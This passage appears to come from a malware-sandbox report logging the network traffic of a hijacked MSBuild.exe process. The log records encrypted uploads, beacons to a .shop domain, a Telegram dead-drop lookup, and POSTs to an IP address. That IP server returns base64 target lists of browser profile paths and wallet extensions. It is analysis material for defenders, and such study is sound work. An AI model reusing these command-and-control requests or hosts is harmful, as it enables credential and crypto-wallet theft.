0e de bd 9e 7c f0 93 eb 6a 4a 59 60 a7 9b 0a df 7d 36 ea 34 db 6c 6e 73 9d Data Ascii: 6_L:~mwW-2*Mf9Mt5A{,UlDEq&>])+$>%JFCm}'jOp^xpj\|FA:=n~>0wz$);y&7mA9;fMM3\\|VyCxgAF,?WO-=uj\|jJY`}64lns
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 8d 54 10 6e 03 f9 ff db 7b 48 c2 8f 61 ec 82 7a 4d 4b 72 6f bc a2 d8 28 b0 27 35 bd 6c 84 82 e7 47 e3 38 40 f1 53 31 d8 9f 37 53 da 7d e3 c9 61 82 4a 40 7a 17 53 6e 36 5b c7 d2 b9 ce da 08 25 ea 65 f1 3c 9a 83 41 b0 9b b2 36 94 f7 42 21 9a 3e b4 05 16 3d 0e 99 5d 6c 90 14 d4 75 3b ff 5e e9 82 df be 48 21 b5 d7 a9 34 c2 77 5a 66 06 9c c0 e7 0b 41 27 2f aa fe be c3 56 12 44 32 09 83 e8 26 bb cb 79 9c 2b 62 d8 cc 56 98 5f ec f5 7a 12 c0 37 69 7d 67 b3 fb ab 80 72 4d 25 56 73 cd ab eb 69 a8 9d cb c6 c0 63 58 99 d3 6d 06 dd 3a 8d 98 df cb e3 34 da 0a 51 f7 61 4e 4a 9e 27 75 30 22 bd 78 63 08 cf 23 be f1 88 ba 42 bc 0f 1d 2a c5 d9 e7 19 c0 f1 7b f3 0f 81 f2 7f 91 81 b1 39 5f 1c b5 f7 45 d7 0f 6f 97 de 94 8e 0a f7 9d ba 06 cc 44 64 96 1b 0b 72 2e e6 ba d8 c3 9c Data Ascii: Tn{HazMKro('5lG8@S17S}aJ@zSn6[%e<A6B!>=]lu;^H!4wZfA'/VD2&y+bV_z7i}grM%VsicXm:4QaNJ'u0"xc#B*{9_EoDdr.
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 17 1c 37 40 9c 31 2e e2 8b 0e ba 87 61 ac 8e 34 df df 30 49 34 06 2b 29 17 59 7f f4 0c fa 8f a5 0e cd 3c 0f 5f 81 72 90 c1 17 1d 88 5d 89 db d5 47 ee be 6a be 65 6d fc 88 61 d3 11 e4 01 04 21 e7 9e 73 76 05 8a bf 3b ab 96 06 6b 55 0a 38 a7 07 84 c8 be 9c a3 ec 31 14 08 cf 6e a9 95 c8 b8 fc 5f fc fe b8 73 c3 47 fa c2 97 4f de 17 2c 3a 07 b6 d8 cc 0b 9e af b9 3b 10 40 09 f0 da aa dc 83 ad ee be 60 7f 3e aa 5a 54 bb 54 00 1c 4a 20 b2 21 d7 79 69 13 b7 85 52 f9 6d 22 a5 b2 20 8f 45 f4 ab bb 13 15 2f 9c 52 e1 7b 7b 13 78 ce 97 99 10 4d 01 69 cb 30 b2 9f 1b de 4c a1 6f 44 de e1 9c 84 78 13 e0 91 4b 19 00 f9 9d 20 7e 37 f3 e5 f2 e8 79 82 e8 73 86 81 9e ba e4 7d 48 6d 1d 01 34 03 3c a0 10 17 cb 6a 1b 60 35 79 c1 a7 20 42 ee d3 a2 12 9e f4 94 c2 d3 75 f4 9f ea 5f Data Ascii: 7@1.a40I4+)Y<_r]Gjema!sv;kU81n_sGO,:;@`>ZTTJ !yiRm" E/R{{xMi0LoDxK ~7ys}Hm4<j`5y Bu_
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 27 ed ad 75 1d e6 27 9c ba ea 0f a3 a1 38 27 91 d7 de 3c a1 f0 5a d3 1a 8f 52 53 8a 8a 64 0f 08 d7 f3 e5 8a e0 14 fd 94 0e 72 73 a3 43 1c a1 57 b2 eb a4 95 cf 4b 6b 34 ac 58 52 73 ae a9 c8 6f 37 89 31 68 a8 ab ea 56 42 7d 67 e4 3d 31 8b bd 22 2e 13 7c a8 d6 4a 12 9c b8 d1 78 69 c7 5b 60 ce 71 6f 34 db 11 fa da 0f 9f ef af 9f d9 1c f9 d1 a7 27 c5 96 d7 68 a4 cd b4 ec d7 1e 8d 88 8d 49 63 f0 84 42 f1 f2 ae 5f ee 57 ae 96 a9 00 9a ab ca e0 f4 12 64 56 1d 6e 97 a3 a2 8a 9f 0f 6d 5f 59 f3 1b 6d db b0 ac 68 59 7b bd e9 16 17 59 b7 ae 76 90 27 51 45 65 a0 71 23 de e3 90 48 9a 21 17 b5 0d d8 9b e6 69 86 fe 1c 1d e5 b6 01 2d 08 fe fb 9e 8a c3 24 d3 0a 4e c8 8f 68 d1 e6 bb 83 ab de e9 24 87 bc 5a ae 0c a7 75 8a 27 f1 30 20 5e 20 b6 38 88 22 b4 85 e6 ac 41 7c 85 06 Data Ascii: 'u'8'<ZRSdrsCWKk4XRso71hVB}g=1".\|Jxi[`qo4'hIcB_WdVnm_YmhY{Yv'QEeq#H!i-$Nh$Zu'0 ^ 8"A\|
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 1f d7 0d 60 79 a5 62 6d e0 c9 b6 55 78 10 71 98 69 d1 ad f2 3a 2d 47 62 53 4c 7a 3a a4 64 0b bb b5 37 65 c4 62 6f e6 0d 7c 59 83 89 cc 04 34 3f 7c 8f 11 b8 e8 2a 1f aa ef dc 5a 63 ec 89 11 39 53 85 c0 79 a9 e4 98 45 f1 d6 90 c7 a9 63 b3 c9 d5 0e 07 bc 26 fa d4 0a d3 0b 44 67 c8 48 f3 49 be ef 45 be 82 7d 31 5e ea 3a d9 bb 94 d5 31 aa 80 17 12 15 65 ae cd a7 16 62 fb fd 33 5d 6c 26 05 0e eb 34 7b fb 6e ed 13 4a 4e d8 9b a7 c3 e5 d3 4b 84 8c 3c 41 f1 a1 91 1d 20 73 e1 1c b3 81 71 e8 b2 47 ac 29 96 35 f5 b1 e0 53 65 17 e4 96 12 26 80 1c 61 47 fc 8a 7f 42 a4 11 b0 8b b9 3c 53 03 d3 40 8d 4a d8 e4 f4 4c 4e 33 0e ec 57 6b b7 87 1f 83 19 c5 ea ff 18 25 ad c1 93 ad 57 78 02 f7 02 16 54 e5 7b 91 48 f3 23 a7 2a 67 aa 87 0f bc d2 dd f5 d5 b9 77 ba 35 ad e4 ce 7f 74 Data Ascii: `ybmUxqi:-GbSLz:d7ebo\|Y4?\|Zc9SyEc&DgHIE}1^:1eb3]l&4{nJNK<A sqG)5Se&aGB<S@JLN3Wk%WxT{H#gw5t
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: fc 6f b6 43 fe 8e d2 95 16 c3 67 fd 77 ab 8c 4b e7 ba fa ff be 72 b7 f4 5b ed 3f af ee 94 ed 2b 5d 9a d4 dd 4d e0 f6 b6 fe 5d c5 fd 33 bc 87 b0 b1 94 d6 8a 5d 7c a5 0c 7a d2 04 06 29 30 2c 22 60 52 b5 79 5d 14 a4 31 c0 62 dd f8 ef 43 20 1b 05 33 b5 33 b5 70 16 80 90 0d a1 10 08 71 b0 2e 0e e5 bc 1e 50 fb 75 1a c9 0b a5 e0 e4 96 d9 07 7b 0c 10 bc 70 51 fc f0 7e 42 d6 e6 c5 fe f4 8f 1a df 77 8a 98 a2 c3 61 f8 59 d3 e5 e5 ee ee ca 3f 0b 57 45 53 c3 d8 86 39 66 1f 62 58 de de 1b ee 2f 1e 41 a4 0c 2f fa 21 30 6b ed 2d 0c 44 04 b1 2d 92 db cd 11 79 cb eb 25 8f 9a 6f 5f 16 d5 c4 f3 52 6c ff d1 a5 87 17 3c f1 6d ff c0 ab f2 50 97 1c 2c 0f dd 29 05 41 18 f8 10 06 ff 6e 17 5e 00 f1 67 2a 3d 5b d0 66 ac ca 8f 8f 7e fc ed 78 ba 00 b8 f4 83 1d fb 03 14 b6 10 6b 2a 93 Data Ascii: oCgwKr[?+]M]3]\|z)0,"`Ry]1bC 33pq.Pu{pQ~BwaY?WES9fbX/A/!0k-D-y%o_Rl<mP,)An^g=[f~xk
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: a2 72 12 f9 68 61 2d 24 e3 68 95 3f 3b 19 c4 0d 31 c2 8c 58 05 f1 9b 93 fc 60 84 6f 95 74 67 e2 e8 46 5f 46 ce 7f ae e5 77 19 c1 c5 ac 9b 77 0d e6 22 e6 95 ee 70 73 04 07 0b be ec 4e fb 61 72 df 6e c3 7b b1 b4 2d 4d 29 a5 35 b4 a6 c2 e5 d2 a5 cd 4d 36 8b 73 3f de 8c a3 cf 38 3a b7 6c 11 38 21 05 f7 5a 48 74 03 6a 8c c4 ff 82 c7 6c 70 39 f3 31 81 65 39 72 24 92 33 5b 3e e1 ea 32 38 53 be dc bd c2 41 2a 2a 86 94 b1 59 28 2d 2c 6d 32 e5 a9 7f c9 82 12 6e 4d 53 20 06 63 c9 47 e2 b3 2c 6d 22 48 12 b2 7e 11 ce 0d 20 f5 2a b6 76 58 54 b8 ff 5e 50 68 ad a4 1c 21 24 16 7d 63 c4 11 64 34 37 38 e7 80 cd d0 08 b4 eb 5a 2d cc fb 92 71 09 8b 8f 7f ff 58 10 1e 16 84 fe a4 d1 dd 83 3f 0b 31 56 fd 67 b6 26 fc 4f 55 f1 05 9f e9 09 68 ba f5 2d 6d e4 bf 2f 13 1b 9a ad 07 86 Data Ascii: rha-$h?;1X`otgF_Fww"psNarn{-M)5M6s?8:l8!ZHtjlp91e9r$3[>28SA*Y(-,m2nMS cG,m"H~ vXT^Ph!$}cd478Z-qX?1Vg&OUh-m/
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 91 60 95 93 bf 67 8e 4b 53 3f 26 ea 8c ae 5e 74 4b 0c c2 74 05 7d ad 61 82 95 dd 33 36 f5 f6 6d eb 8e a7 7e fd a9 ab fd 7b 5b 90 5d fe 02 8f 28 3a f2 66 42 c8 bb 11 94 d7 a5 d1 49 cb 37 c2 e0 24 b4 57 6b da e8 b3 ea 14 a1 80 85 6f 19 94 99 85 5d 98 1a 27 f2 4d d4 2e d4 b7 55 9a 1c 61 d9 9f 7a 0d 78 fd 48 d8 1f c1 cf 31 40 37 17 5a 46 31 38 65 79 68 17 be fc 04 35 8f 8d 81 7c 2a 91 4d 8a ae ba 8b b6 a3 67 1b 01 1c 56 6a 1b 29 b6 3b 65 17 4f b5 55 70 b4 04 6b 80 85 7e ad bf 78 e5 b2 9f 76 74 dd ed 21 32 2c df 00 61 f0 78 21 c5 cb 6f 55 94 ef 35 d8 eb ce ec 5a 7b a1 2a f4 d8 58 e7 7e 54 fa 05 d6 11 a4 ea ac 06 3e 75 dd 36 6f e3 99 1f de a6 9b 1f a7 7a 3e 8f a5 78 f8 bd 2b a0 65 e0 0c 16 c7 47 36 4e f0 5b 7f 0c a3 75 49 98 7c ff 26 d6 ca ee 8c 26 94 f1 f9 ac Data Ascii: `gKS?&^tKt}a36m~{[](:fBI7$Wko]'M.UazxH1@7ZF18eyh5\|MgVj);eOUpk~xvt!2,ax!oU5Z{X~T>u6oz>x+eG6N[uI\|&&
2024-07-26 16:57:00 UTC	15331	OUT	Data Raw: 2a df 21 a6 95 7d 76 d0 ca 79 5c ef 74 8a 3a 54 f5 8d 5c 02 59 56 ca 60 66 eb 8c a1 8d ea 29 32 32 cd a1 8d 8a 1a e5 b9 66 c2 9c 56 37 ed fc b3 df fa 92 50 6d 12 c5 69 32 82 52 86 79 25 e2 90 77 99 5c 1b 26 0b 6d 91 f9 54 29 04 44 ec 8a 02 09 47 59 9c 75 ff 31 22 bb 2f a6 3d b4 14 d7 5c 17 90 ff 8a 81 ce d9 a5 58 fe ef 38 29 fb a3 d2 da 37 39 da b7 e5 d3 03 6c 11 e5 08 06 79 fe d7 45 5c 61 b2 15 b3 c6 bb 1f a5 ba a7 3f a4 48 ba 4f 77 6a 99 e5 50 97 15 69 5f fb 4e a5 9c c0 fa 91 99 52 5a 74 9e d8 f4 ad bc 5b 39 ac d0 4f 5b b2 ff 9d 30 73 62 7e 3b 20 39 c5 86 e2 be 5a 9c 0a 1f f8 d7 cb 60 cf f2 87 ba d9 17 b3 91 ef a5 1b bd c2 5f 2e 56 eb cd b8 2b cf 5a fe 83 3e fb 0f da 35 42 6a b6 5a b4 63 ed 1b ab 6f a6 34 ed 63 5f c0 13 e9 c2 bc e9 98 63 b7 4e ba 04 ed Data Ascii: *!}vy\t:T\YV`f)22fV7Pmi2Ry%w\&mT)DGYu1"/=\X8)79lyE\a?HOwjPi_NRZt[9O[0sb~; 9Z`_.V+Z>5BjZco4c_cN
2024-07-26 16:57:02 UTC	808	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:57:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9um0oqrvb726tv2cqvj7vbnpdj; expires=Tue, 19-Nov-2024 10:43:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LFdOY9GxV4hd%2F%2BOTaIeDy5E8iKYvWC5TUB5grlCMk8fLAV3Whz2o%2B8qAau8Spqd%2BswmR2d3fZV7QfljWDMPmJxQTUearuZVGDGUm3dpHiJNtSCbMgRA9bO6dOW0VYbC9HIz4bGwnMgA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ed21becd191e-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49773	172.67.213.85	443	7916	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:03 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: liernessfornicsa.shop
2024-07-26 16:57:03 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 26 68 77 69 64 3d 36 44 46 42 35 46 32 34 41 32 46 42 38 45 43 37 44 32 46 36 36 44 42 36 41 32 37 43 41 43 32 31 Data Ascii: act=get_message&ver=4.0&lid=H8NgCl--&j=&hwid=6DFB5F24A2FB8EC7D2F66DB6A27CAC21
2024-07-26 16:57:04 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 16:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ofcloi5lil072988de539gcamv; expires=Tue, 19-Nov-2024 10:43:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KREC85CvZ1WRMx9Ot3cVRIGE3J7d1bEtaE94S%2F5fihEVD1DEtA3hyNgtiKj8IybzYCS4DHj269gUB87OJ64s0dI2KAFkIsxIKP2M7y%2B6qDwNOS7imvC8v1%2FFw3tXP3BocalxEZlqJBw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a95ed35b874430f-EWR alt-svc: h3=":443"; ma=86400
2024-07-26 16:57:04 UTC	54	IN	Data Raw: 33 30 0d 0a 50 48 5a 66 70 61 6b 4c 71 48 49 33 49 52 74 55 62 47 42 6f 78 5a 54 67 52 69 47 71 6b 6a 68 58 57 72 66 52 34 52 30 4d 36 2b 52 6e 4b 77 3d 3d 0d 0a Data Ascii: 30PHZfpakLqHI3IRtUbGBoxZTgRiGqkjhXWrfR4R0M6+RnKw==
2024-07-26 16:57:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49780	149.154.167.99	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:24 UTC	84	OUT	GET /s41l0 HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:24 UTC	510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 26 Jul 2024 16:57:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12287 Connection: close Set-Cookie: stel_ssid=a58ed1c542dee65950_605481942079982027; expires=Sat, 27 Jul 2024 16:57:24 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2024-07-26 16:57:24 UTC	12287	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 73 34 31 6c 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @s41l0</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49781	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:26 UTC	233	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:57:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49782	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:27 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Content-Length: 279 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:27 UTC	279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 43 41 34 31 41 45 32 37 32 39 34 32 36 36 34 39 38 37 32 31 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 4b 4a 4a 4b 4a 45 47 49 45 43 41 4b 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 37 61 37 61 34 37 65 31 61 36 66 66 32 36 36 61 66 38 33 35 64 35 30 63 36 65 61 61 35 0d 0a 2d 2d 2d 2d 2d 2d Data Ascii: ------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="hwid"B6CA41AE27294266498721-a33c7340-61ca-11ee-8c18-806e6f6e6963------KKJKKJJKJEGIECAKJJEBContent-Disposition: form-data; name="build_id"b607a7a47e1a6ff266af835d50c6eaa5------
2024-07-26 16:57:28 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:57:28 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 64 36 35 66 64 66 62 62 34 37 62 33 35 64 33 33 30 30 39 65 62 31 37 61 38 31 64 33 36 34 39 7c 31 7c 31 7c 31 7c 30 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|ad65fdfbb47b35d33009eb17a81d3649\|1\|1\|1\|0\|1\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49783	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:28 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 64 36 35 66 64 66 62 62 34 37 62 33 35 64 33 33 30 30 39 65 62 31 37 61 38 31 64 33 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 37 61 37 61 34 37 65 31 61 36 66 66 32 36 36 61 66 38 33 35 64 35 30 63 36 65 61 61 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------DHCGHDHIDHCBGCBGCAEBContent-Disposition: form-data; name="token"ad65fdfbb47b35d33009eb17a81d3649------DHCGHDHIDHCBGCBGCAEBContent-Disposition: form-data; name="build_id"b607a7a47e1a6ff266af835d50c6eaa5------DHCGHDHIDHCBGCBGCAEBCont
2024-07-26 16:57:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:57:29 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49784	65.108.151.108	443	7828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 16:57:30 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36 Host: 65.108.151.108 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-07-26 16:57:30 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 64 36 35 66 64 66 62 62 34 37 62 33 35 64 33 33 30 30 39 65 62 31 37 61 38 31 64 33 36 34 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 36 30 37 61 37 61 34 37 65 31 61 36 66 66 32 36 36 61 66 38 33 35 64 35 30 63 36 65 61 61 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 42 41 46 49 4a 44 47 48 43 41 4b 45 43 41 45 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="token"ad65fdfbb47b35d33009eb17a81d3649------DGCBAFIJDGHCAKECAEGCContent-Disposition: form-data; name="build_id"b607a7a47e1a6ff266af835d50c6eaa5------DGCBAFIJDGHCAKECAEGCCont
2024-07-26 16:57:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 16:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-07-26 16:57:31 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 